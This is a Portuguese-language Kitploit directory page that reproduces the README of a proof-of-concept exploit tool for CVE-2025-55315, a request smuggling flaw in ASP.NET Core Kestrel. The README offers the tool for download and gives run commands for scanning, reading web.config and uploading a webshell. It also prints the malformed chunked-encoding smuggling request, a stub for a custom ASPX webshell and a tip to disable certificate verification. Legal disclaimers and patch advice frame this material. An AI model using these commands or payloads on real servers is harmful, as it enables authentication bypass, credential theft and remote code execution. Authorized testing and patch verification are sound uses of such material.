Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55315-PoC-Exploit — Exploit de PoC do CVE-2025-55315 | Kitploit
Ferramentas/GitHubGitHub/zemarkhos/cve-2025-55315-poc-exploit
Scanners de VulnerabilidadesGeração de PayloadsExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubzemarkhos/cve-2025-55315-poc-exploit

CVE-2025-55315-PoC-Exploit

Exploit de PoC do CVE-2025-55315

Ver Repositório
853há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Ferramenta de Pentest para CVE-2025-55315

Ferramenta de Exploração de Contrabando de Requisições HTTP para ASP.NET Core Kestrel

Python Version CVE CVSS License


⚠️ AVISO LEGAL

ESTA FERRAMENTA É APENAS PARA TESTES DE SEGURANÇA AUTORIZADOS!

  • Use SOMENTE em sistemas que você possui ou para os quais tenha autorização escrita explícita para testar
  • Acesso não autorizado a sistemas de computador é ILEGAL
  • O criador da ferramenta NÃO é responsável pelo uso indevido
  • Ao usar esta ferramenta, você aceita total responsabilidade legal

📋 Visão Geral

Ferramenta profissional de teste de penetração para (vulnerabilidade de contrabando de requisições HTTP no ASP.NET Core Kestrel). Esta ferramenta foi projetada para análise de alvo único com capacidades abrangentes de exploração.

CVE-2025-55315

O que é a CVE-2025-55315?

Uma vulnerabilidade crítica de contrabando de requisições HTTP no servidor web ASP.NET Core Kestrel (CVSS 9.9/10) que permite que atacantes:

  • Contornem a autenticação
  • Roubem credenciais e tokens de sessão
  • Executem Server-Side Request Forgery (SSRF)
  • Envenenem caches
  • Façam upload de webshells e obtenham execução remota de código

Versões Afetadas:

  • .NET Core 3.0 até .NET 9.0.9
  • Corrigido em: .NET 8.0.21+, 9.0.10+, 10.0.0-rc2+

✨ Recursos

Capacidades Principais

  • ✅ Análise de Alvo Único - Teste de penetração focado em um alvo específico
  • ✅ Descoberta Automática de Endpoints - Descobre endpoints comuns do ASP.NET Core
  • ✅ Teste Manual de Endpoints - Testa endpoints específicos de interesse
  • ✅ Detecção de Vulnerabilidades - Detecção precisa da CVE-2025-55315
  • ✅ Extração de web.config - Lê arquivos de configuração via contrabando de requisições
  • ✅ Upload de Webshell - Capacidade opcional de implantação de webshell
  • ✅ Relatórios Detalhados - Relatórios em formato JSON e texto
  • ✅ Recursos de Segurança - Múltiplas solicitações de confirmação para ações destrutivas

Recursos Técnicos

  • Suporte a HTTP/1.1 e HTTPS
  • Suporte a portas personalizadas
  • Timeouts configuráveis
  • Modo de depuração verboso
  • Saída de terminal com código de cores
  • Ignorar validação de certificado SSL (para testes)

🔧 Instalação

Requisitos

root@kitploit:~
# Python 3.7 or higher
python3 --version

# No external dependencies - uses only standard library

Download

root@kitploit:~
# Clone or download the tool
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit

# Make executable
chmod +x cve_2025_55315_PoC.py

🚀 Início Rápido

Verificação Básica de Vulnerabilidade

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com

Isso irá:

  1. Coletar informações do servidor
  2. Descobrir automaticamente endpoints ativos
  3. Testar cada endpoint para a CVE-2025-55315
  4. Exibir resultados no terminal

Testar Endpoint Específico

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com -e /api/login

Verificação Completa com Extração de web.config

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt

Avançado: Exploração Completa (Somente Autorizado!)

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t target.com \
  --read-config \
  --upload-shell \
  -v \
  -o full_report.txt

📖 Exemplos de Uso

Exemplo 1: Verificação Rápida

Cenário: Verificar se o servidor de produção está vulnerável

root@kitploit:~
python3 cve_2025_55315_PoC.py -t api.mycompany.com

Duração Esperada: 30-60 segundos


Exemplo 2: Verificação Detalhada

Cenário: Verificação abrangente de endpoints com saída verbosa

root@kitploit:~
python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt

Duração Esperada: 2-5 minutos


Exemplo 3: Testar Múltiplos Endpoints

Cenário: Testar endpoints críticos específicos

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t api.mycompany.com \
  -e /api/payment/process \
  -e /api/admin/users \
  -e /api/internal/config \
  -o critical_endpoints.txt

Exemplo 4: Destino Sem SSL

Cenário: Testar servidor HTTP interno

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t internal-api.local \
  -p 8080 \
  --no-ssl

📊 Opções de Linha de Comando

root@kitploit:~
usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
                                  [--no-ssl] [--read-config] [--upload-shell]
                                  [-o OUTPUT] [-v] [--timeout TIMEOUT]

Required Arguments:
  -t, --target         Target hostname or URL (e.g., target.com)

Optional Arguments:
  -p, --port           Port number (default: 443 for SSL, 80 for non-SSL)
  -e, --endpoint       Specific endpoint(s) to test (can be used multiple times)
  --no-ssl             Disable SSL/HTTPS (use HTTP)
  --read-config        Attempt to read web.config file
  --upload-shell       Attempt webshell upload (requires confirmation)
  -o, --output         Save report to file
  -v, --verbose        Enable verbose output
  --timeout            Socket timeout in seconds (default: 10)
  -h, --help           Show help message

🔍 Entendendo a Saída

Exemplo de Sistema Vulnerável

root@kitploit:~
Target: old-api.company.com:443
Vulnerable: YES - CRITICAL

--- Server Information ---
  server: Kestrel/8.0.15
  kestrel_detected: True
  http_version: 1.1

--- VULNERABLE ENDPOINTS (2) ---
  ✗ /api/login
    Details: Request smuggling successful - multiple responses
  ✗ /api/health
    Details: Request smuggling successful - multiple responses

--- SUCCESSFUL EXPLOITS ---
  ✓ web.config_read via /api/login

Interpretação:

  • 🔴 VULNERABILIDADE CRÍTICA DETECTADA
  • 🔴 Múltiplos endpoints estão vulneráveis
  • 🔴 O arquivo de configuração foi extraído com sucesso
  • ⚡ URGENTE: Atualize para .NET 8.0.21+ ou 9.0.10+

Exemplo de Sistema Seguro

root@kitploit:~
Target: new-api.company.com:443
Vulnerable: NO - SECURE

--- Server Information ---
  server: Kestrel/9.0.10
  kestrel_detected: True
  http_version: 1.1

[SUCCESS] ✓ Endpoint NOT vulnerable (400 Bad Request)

✓ No vulnerable endpoints found - target may be patched

Interpretação:

  • ✅ O SISTEMA ESTÁ SEGURO
  • ✅ Executando versão corrigida do Kestrel
  • ✅ Todas as requisições malformadas foram rejeitadas

🛡️ Segurança e Ética

Lista de Verificação de Autorização

Antes de executar esta ferramenta, certifique-se de que:

  • Você possui o sistema alvo, OU
  • Você tem autorização por escrito para testar, E
  • A equipe de segurança foi notificada, E
  • Você tem um plano de reversão, E
  • Você entende as implicações legais

Recursos de Segurança Embutidos

  1. Confirmação em duas etapas - A ferramenta solicita autorização antes de iniciar
  2. Confirmação de upload de webshell - Requer digitar "YES" em letras maiúsculas
  3. Limitação de taxa - Atrasos entre requisições durante a descoberta automática
  4. Proteção por timeout - Evita conexões pendentes
  5. Registro detalhado - Todas as ações são registradas para trilha de auditoria

🔬 Detalhes Técnicos

Técnica de Exploração

A ferramenta explora a CVE-2025-55315 usando codificação de transferência em blocos (chunked) malformada:

root@kitploit:~
POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked

2;\n          ← VULNERABILITY: Lone \n instead of \r\n
XX
0\r\n
\r\n
GET /smuggled HTTP/1.1    ← This becomes a separate request
Host: target.com

Por Que Isso Funciona:

  1. Servidor proxy vê \n como terminador de linha → processa como uma única requisição
  2. Kestrel (vulnerável) ignora \n → trata o GET contrabandeado como requisição separada
  3. A requisição contrabandeada pode ser executada no contexto de sessão de outro usuário

Lógica de Detecção

Resposta do ServidorInterpretaçãoStatus
400 Bad RequestKestrel rejeitou o bloco malformado✅ Seguro (corrigido)
Múltiplas respostas HTTP/1.1Duas respostas separadas recebidas❌ Vulnerável
500 ou 502Erro interno do servidor⚠️ Provavelmente vulnerável
200 OK normalRequisição aceita⚠️ Inconclusivo

🐛 Solução de Problemas

Falha na Conexão

root@kitploit:~
[ERROR] Connection failed: [Errno 111] Connection refused

Soluções:

  • Verifique se o alvo está acessível: ping target.com
  • Verifique se o número da porta está correto
  • Tente com/sem SSL: --no-ssl
  • Verifique as regras de firewall

Erro de Certificado SSL

root@kitploit:~
[ERROR] Connection failed: certificate verify failed

Solução: A ferramenta já desabilita a verificação de certificados. Se o problema persistir:

root@kitploit:~
export PYTHONHTTPSVERIFY=0
python3 cve_2025_55315_PoC.py -t target.com

Erros de Timeout

root@kitploit:~
[WARNING] No response - possible timeout

Soluções:

  • Aumente o timeout: --timeout 30
  • Verifique a conectividade de rede
  • O alvo pode estar lento ou sobrecarregado

Upload Bloqueado

root@kitploit:~
[WARNING] Upload blocked (forbidden/method not allowed)

Explicação:

  • A configuração do servidor bloqueia métodos PUT/POST
  • O WAF/IPS está bloqueando o upload
  • As permissões de arquivo impedem gravações

Isso é normal - nem todos os sistemas vulneráveis permitem upload de arquivos.


📚 Referências

Recursos da CVE-2025-55315

  1. Comunicado de Segurança da Microsoft: https://github.com/dotnet/aspnetcore/issues/64033

  2. Banco de Dados NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55315

  3. Pesquisa da Praetorian ($10k de Bug Bounty): https://www.praetorian.com/blog/how-i-found-the-worst-asp-net-vulnerability-a-10k-bug-cve-2025-55315/

  4. Análise Técnica de Andrew Lock: https://andrewlock.net/understanding-the-worst-dotnet-vulnerability-request-smuggling-and-cve-2025-55315/

Contrabando de Requisições HTTP

  1. Pesquisa da PortSwigger: https://portswigger.net/web-security/request-smuggling

  2. OWASP: https://owasp.org/www-community/attacks/HTTP_Request_Smuggling


🔄 Personalização

Adicionar Endpoints Personalizados

Edite COMMON_ENDPOINTS no script:

root@kitploit:~
COMMON_ENDPOINTS = [
    '/your/custom/endpoint',
    '/api/myapp/admin',
    # Add your endpoints here
]

Usar Webshell Personalizado

Modifique o método upload_webshell():

root@kitploit:~
def upload_webshell(self, endpoint: str = '/', shell_path: str = '/shell.aspx',
                   shell_content: str = None):
    if not shell_content:
        shell_content = '''
        <!-- Your custom ASPX webshell here -->
        '''

📝 Relatando Problemas

Se você encontrar bugs ou tiver sugestões:

  1. Execute com o modo verboso: -v
  2. Salve a saída completa: -o debug.txt
  3. Inclua:
    • Versão do Python
    • Comando utilizado
    • Mensagem de erro
    • Comportamento esperado vs. real

⚖️ Aviso Legal

root@kitploit:~
THIS TOOL IS PROVIDED "AS IS" FOR EDUCATIONAL AND AUTHORIZED
SECURITY TESTING PURPOSES ONLY.

THE AUTHOR(S):
❌ Do NOT endorse illegal activities
❌ Are NOT responsible for misuse
❌ Are NOT liable for any damages
❌ Do NOT provide legal advice

BY USING THIS TOOL YOU AGREE:
✅ To use only on authorized systems
✅ To accept full legal responsibility
✅ To comply with all applicable laws
✅ To follow ethical hacking principles

UNAUTHORIZED USE IS STRICTLY PROHIBITED AND ILLEGAL!

🎓 Propósito Educacional

Esta ferramenta foi criada para:

  • Pesquisadores de segurança
  • Testadores de penetração
  • Caçadores de bug bounty
  • Administradores de sistemas
  • Treinamento de conscientização em segurança
  • Avaliações de segurança autorizadas

NÃO para:

  • Ataques maliciosos
  • Acesso não autorizado
  • Reconhecimento competitivo
  • Qualquer atividade ilegal

🙏 Agradecimentos

  • Microsoft Security Response Center - Pela divulgação da CVE e pelas correções
  • Praetorian Security - Pela pesquisa original da vulnerabilidade
  • Andrew Lock - Pela análise técnica detalhada
  • Comunidade de segurança - Pelas práticas de divulgação responsável

📄 Licença

Apenas para Testes de Segurança Educacionais e Autorizados

Esta ferramenta é fornecida para fins educacionais e testes de segurança autorizados. O uso comercial, a redistribuição ou o uso para fins maliciosos são estritamente proibidos.


🔐 Aviso Final

root@kitploit:~
╔═════════════════════════════════════════════════════════════╗
║                                                             ║
║  USE THIS TOOL RESPONSIBLY AND LEGALLY!                     ║
║                                                             ║
║  Unauthorized access to computer systems is a CRIME.        ║
║  Always obtain written permission before testing.           ║
║  Follow responsible disclosure practices.                   ║
║                                                             ║
║  Happy (Legal) Hacking!                                     ║
║                                                             ║
╚═════════════════════════════════════════════════════════════╝

Baixar ferramenta